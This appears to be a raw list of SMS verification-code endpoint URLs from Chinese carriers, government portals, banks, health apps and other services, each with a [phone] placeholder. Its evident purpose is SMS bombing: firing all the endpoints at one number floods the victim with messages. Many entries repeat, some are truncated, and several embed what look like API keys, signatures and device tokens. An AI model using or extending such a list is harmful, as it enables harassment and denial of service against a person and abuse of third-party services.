"https://api.passport.pptv.com/snsms/sendcode?_source=ppsports&apptype=android&appversion=1.0.7.1&deviceId=7433976558071546231901338_vx768bn3ieimjk1n3g5opc7w&terminal=APP&phoneNumber=[phone]&channel=208000202030&format=json&", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=1", - "http://www.wehealthchina.net/api/v0.1/vcode?app=doctor&client=android&action=register&phone=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]&_=1570699976144", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://duanxin.diluw.com/index.php?hm=[phone]&ok=", - "https://nhapi01.tv189.com/cpms/Internet?appid=111010310081&phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834221&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&devid=000001&pcode=4&accessType=99&clienttype=5&token=417", - "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "https://n.daoxila.com/verification/appSend?mobile=[phone]&time=1564746677059", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://wapi.jfh6688.cn/sendRegisterCode?type=1&login=[phone]", - "https://app.leyou.com.cn/system/sendSms?mobile=[phone]&sign=fb0a624aade8b0e135196025cbc191c2&transtype=reg_m", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]&_=1535534872440", - "http://yueban.500zhuan.com/tools/getNum?&phone=[phone]&sign=20f2f798a813a8115f5a837c7cad140b&timestamp=1566033453", - "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=%E6%82%A8%E7%9A%84%E7%9F%AD%E4%BF%A1%E9%AA%8C%E8%AF%81%E7%A0%81%E6%98%AF%3A%25verifycode%25%E3%80%82%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E5%8F%B7%E6%AD%A3%E5%9C%A8%E4%", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567899", - "http://m.tk.cn/tkmobile/orderSentSmsServlet?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.zkzcfu.cn/api/sms/send?mobile=[phone]&event=register", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://hz.95sc.cn/api.php?act=user&key=7awn1zd6tRCRuTDD1c&phone=[phone]", - "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", - "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]&request_ts=1564116332", - "https://cloud.maitao.com/auth/code?cityId=2&uid=&cfbundleversion=5.12.0&imei=32E30496-2A31-463B-A1BD-75B005303E41&channelid=AppStore&devicetoken=69103da60f6eca7a15a995f4f33371ce6413567d5df01d1335f6ab25a47a2f3c&fromapp=1&token=05F452E3F79B7410AC8962C7445483E81AD2ACC", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://gateway-api.kuainiujinke.com/etrack/record?date=2019-09-02&refer=https://www.daishangqian.com/m/#/user/login&source=dsq&timestamp=1567390955843&traceId=A15C586B-6CFF-47C7-81FF-3ACFFB39D046&uid=&url=https://www.daishangqian.com/m/%2", - "https://m.wanghairead.com/api/5b9e03e333e5e?phone=[phone]&send_type=1", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://jz.gymchina.com/api/user/getVerificationCode.json?phone=[phone]&platform=and&sid=43d54311742a6c62a11ef8b64d8c7ac1&brand=OPPO&version=2.2.6&appName=tomato&partner=xiaomi&model=PCRT00", - "https://passport.beva.com/passport/v1/sdk/sendvcode?callback=jQuery111009421744498287961_1580993309090&nonce=1569211859&devcode=1E0D9617438F4A0DBED0AEB20FF19A50&mobile=[phone]&scene=mobilelogin&sign=cba0ddbe3e68126d5d24d2d6342754d6&platform=6&_=1580993309095", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://mobile.icourses.cn/hep-mobile/sword/app/register/getCodeByPhone?callback=jQuery111009421744498287961_1580993309090&phone=1557078659&_=1580993309108", - "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", - "https://a1.go2yd.com/Website/user/login-mobile?platform=1&androidId=3d733e2a62588cd977f14876331368d1&deviceId=5284047f4ffb4e04824a2fd1d1f0cd62&cv=4.8.8.1&secret=7a0a51884d933ea12bc8531edb05147468a8f136&reqid=czak52qh_1547987726471_360&brand=Xiaomi&mobile=8618529142", - "http://m.cqrenrenle.com/v3/users/code?mobile=[phone]&from=reg&packagename=com.feifan.app&platform=android", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=5", - "http://www.lamall.com/user/sendsmscode?jsonpCallback=$.jsonp.jsonp1445158351&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=5", - "http://msg.106117.com/submit_ajax.ashx?callback=jQuery11120017795995642418072_1558097551516&username=[phone]&action=getValidate&_=1558097551517", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", - "http://srmemberapp.srgow.com/sys/captcha/[phone]", - "https://p.doras.api.vcinema.cn/v5.0/user/[phone]/send_code", - "http://webapp.qianbao188.aloestec.com/v2/app/pub/channel/smsCode?phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]&img_vc=", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "https://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]&os=ios&timestamp=1569225015&type=mobile&soft=5.4.2&_=1580993309101", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://bank.wo.cn/wxun/api/my/getSmsCode?mobile=[phone]", - "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]&type=1&token=YzVkMGVlYWMtZTU4My00MTc2LWJkMzYtZGZlMWRjODgwYjBkZDBiMDg4Y2QxZWZkLTYzZGItNjcxNC0zODVlLWNhZWUwZDVj", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", - "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]&img_vc=", - "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]&showtopbar=true&DeviceType=E&Version=7.1.2&SystemVersion=6.0.1&behavior_entryid=lgf005001", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://h5user.rastargame.com/vcode/Mobile/page/?callback=jQuery111306684320296387496_1551691777816&mobile=[phone]&type=reg&client=wap&_=1551691778330", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://wx.fowep.com/iwater/v1/usercenter/nt/sendAuthCode/v2.json?requestPara=%7B%22mobile%22:%22[phone]%22,%22type%22:1,%22token%22:null,%22waterCorpId%22:3,%22UNID%22:%22%22,%22areaId%22:0,%22accountType%22:%22XJ%22,%22apiType%22:%22PC%22,%22appVersion%22:%221.0.2%22%7D", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "https://papa.51nbapi.com/mobile/app/phoneCheck?phone=[phone]&appName=sujiebaitiao&appChannel=AppStore&appVersion=1.2.0&appDevice=I", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]&pver=7.0&session_id=&source=105001&ver=5.5.5", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", - "http://app.yioucash.com/loan-h5/app/validcode/send?atype=1&phoneNo=[phone]&atype=2", - "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", - "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", - "https://dappweb.huolala.cn/index.php?_su=1609554659540820860&revision=&_m=register&_a=send_register_sms_code&phone_no=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]&_=1551173567939", - "http://i.kuwo.cn/US/2014/api/send_sms.jsp?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", - "https://mapi.wandougongzhu.cn/?method=User.sendRegCode&ch=appstore&devid=6850174bf9bcd0264c01eac202a8447e&devname=&devtype=iphone_gg&dpi=750x1334&img_fmt=webp&lang=zh-Hans-CN&loc=&model=iPhone8%2C1&network_type=wifi&os_version=12.4&phone=[phone]&rtick=1566790690.50", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", - "http://zhuikanxs.com/novelapilogin/sendsms?phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&package=sxrqowww.com&version=1.6.9&token=384e798aee87f24f4a228a41df049e27&type=1&timestamp=1567400876&sign=9726d9876bd9e1bbc5667eeadd28e42b", - "https://uas.xingshulin.com/passport/default/captcha/LOGIN/sms/[phone]?", - "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4&degrees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]&os_version=12.4&scree", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]&learn_stage=0&appChannel=App%20Store&cUDID=5C351103-F887-4932-BC59-58C75875EFDE&lng=106.2849618867906&appVersion=7.5.3&que_city_id=27&os=iOS&enr_city_id=75&openUDID", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", - "http://mobile.yougou.com/v_1.8/quicklyLoginMobileverify?username=[phone]", - "https://p.doras.api.vcinema.cn/v5.0/user/[phone]/send_code", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://pass.hujiang.com/v2/Handler/UCenter?action=SendMsg&imgcode=&token=1e7bbab658a5b65cbc3074d6296a0b9b&sendtype=register&msgtype=1&captchaVersion=2&user_domain=hj&business_domain=&hpuid=P0S4wETf4noqmS29L5650&callback=reqwest_1546707722757024049&mobile=%2B86-[ph", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.imdxd.com/api/method/getCode?phone=[phone]&type=2", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://iosapi.shixiseng.com/app/telrandcode?sign=6F4C6784400B289D3B0BC2742D704E59&tel=[phone]&time=1564926500.453583&type=reg", - "https://soufunapp.3g.fang.com/http/sfservice.jsp?messagename=appSendMobileCode&mobilephone=[phone]&operatetype=0&sendvoice=0&wirelesscode=2C56469F49A8526BC922ECFA14C22AC7", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://vapi.yuike.com/1.0/user/is_register.php?phone=[phone]&sign=69f0ce3725947d7f9d6b798e68700f3a&yk_pid=3&yk_appid=1&yk_cc=yuikemall&yk_cvc=319&mid=457465", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://www.txooo.com/Txooo/Main/BusinessRequirement/Ajax/BusinessRequirementAjax.ajax/SendMobileCode?mobile=[phone]", - "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://www.milvwang.com/user/isRegister/?mobile_phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", - "https://m.rong360.com/mobile/Wxpageforapp/SendSmsVcode?mobile=[phone]&callback=rong_json1565594522310&v=7620", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://m.rong360.com/mobile/Wxpageforapp/SendSmsVcode?mobile=[phone]&callback=rong_json1565594522310&v=7620", - "http://app.zangcun.com/registerCode?mobile=[phone]", - "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]&sign=8D0A118A972CD8A303403728659FC0F4FA194447", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://yueban.500zhuan.com/tools/getNum?&phone=[phone]&sign=20f2f798a813a8115f5a837c7cad140b&timestamp=1566033453", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]&code=&isSupportSession=1&src=ios&token=5d3fa06f6d96f74c953459ba&ver=5.1.2", - "http://www.baixing.com:80/m/oz/verify/reg?mobile=[phone]", - "https://dakaapp.troila.com/api/v7/index/send_sms?phone=[phone]&expect=0", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=&app_code=ECS-YH-WAP", - "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=%23code%23%3d321809&key=a68cead9b27523c56ce7fd7fc1312ea4", - "http://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]&signature=b9ca097bdb7678ffe631d0aecb2615e16b4986f4&timestamp=1558168022&nonce=573&appid=CalendarGPRJ", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://ddxq.mobi/api/v1/user/mobile/check/?api_version=8.30.2&app_client_id=1&channel=App Store&countryCode=CN&device_id=a3bd2adebf3a389bb044fea62d52c8c55a1577ce&device_model=iPhone8,1&device_name=iPhone 6s&languageCode=zh&latitude=29.587192&localeIdentifier", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]&temp=1551691791466&operatetype=2", - "https://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]&app_code=ECS-YH-WAP", - "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]&PUBLIC_SERVICE_TYPE=0&hospitalID=&isRead=1&loc=c&", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "https://api.passport.pptv.com/snsms/sendcode?_source=ppsports&apptype=android&appversion=1.0.7.1&deviceId=7433976558071546231901338_vx768bn3ieimjk1n3g5opc7w&terminal=APP&phoneNumber=[phone]&channel=208000202030&format=json&", - "http://dapi.mting.info/yyting/usercenter/getVerifyCode.action?phoneNum=[phone]&type=0&token=&imei=&nwt=1&q=27&sc=", - "http://wap.zt.raiyi.com/weixin/bind/verifyMobile?mobile=[phone]&appCode=fc_wx&buyChannel=OfficialAccounts&vtype=0", - "https://dakaapp.troila.com/api/v7/index/send_sms?phone=[phone]&expect=0", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=4eee9083e9d146799ef5828ac583d8b3&user_domain=hj", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://duanxin.diluw.com/index.php?hm=[phone]&ok=", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://secure.changba.com/ktvboxs.php?ac=phonestartentry&curuserid=0&channelsrc=appstore&version=9.1.1&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=78363e2e9ba7642df7b2f474a64b66b7cf7cdfbc&systemversion=12.4&device=iPhone8,1&b", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]&_=1584688891342", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://zaiwai.8848.com/commonService/findMessageToken?phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://api.yuyin-tv.com/v1/account/verifycode/register?phone=[phone]", - "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]&ac=WIFI&channel=App%20Store&app_name=joke_zone&aid=27&version_code=2.2.0&device_platform=iphone&os_version=12.4&device_type=iPhone8,1&device_id=68923678300&vid=FFAA4EA8-1E5C-4EA0-9A1E", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://sqb.xiaoshijie.com/api/1/user/getCaptcha/?_did=00000000-7998-6e7e-026a-0aa25c86693a&_app=sqbao&_atype=android&_network=2&_networkType=0&_t=1556866758&_swidth=1080&_sheight=1920&_imei=861913032338784&_manufacture=ZTE&_model=ZTE+BV0730&_osver=6.0&_tn=0&_st=0&i", - "http://ccyagu.gswanzhong.com/Apicloud/User/sendCaptcha?Mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=%E6%82%A8%E7%9A%84%E7%9F%AD%E4%BF%A1%E9%AA%8C%E8%AF%81%E7%A0%81%E6%98%AF%3A%25verifycode%25%E3%80%82%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E5%8F%B7%E6%AD%A3%E5%9C%A8%E4%", - "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=4eee9083e9d146799ef5828ac583d8b3&user_domain=hj", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://app.yioucash.com/loan-h5/app/validcode/send?atype=1&phoneNo=[phone]&atype=2", - "http://api.yuyin-tv.com/v1/account/verifycode/register?phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]&agenttype=20&app_version=10.7.5&area_code=86&device_id=5C351103-F887-4932-BC59-58C75875EFDE&device_name=liang%E7%9A%84%20iPhone&device_type=iPhone8,1&dfp=876bc199dfb98e452da6f0f683179849687da", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=2", - "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=+86&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://www.gangaimall.com/mbb-web/api/account/code?mobile=[phone]&type=0", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", - "http://user.daojia.com/mobile/getcode?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.hyb100.com/huoyb/vc10001.action?userid=[phone]&ic10000=", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4&degrees=[]&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]&os_version=12.4&scree", - "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]&_=1570683350704", - "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://gw.dianzhenkeji.com/userc/sms/[phone]/2?tenantId=dxtv", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - 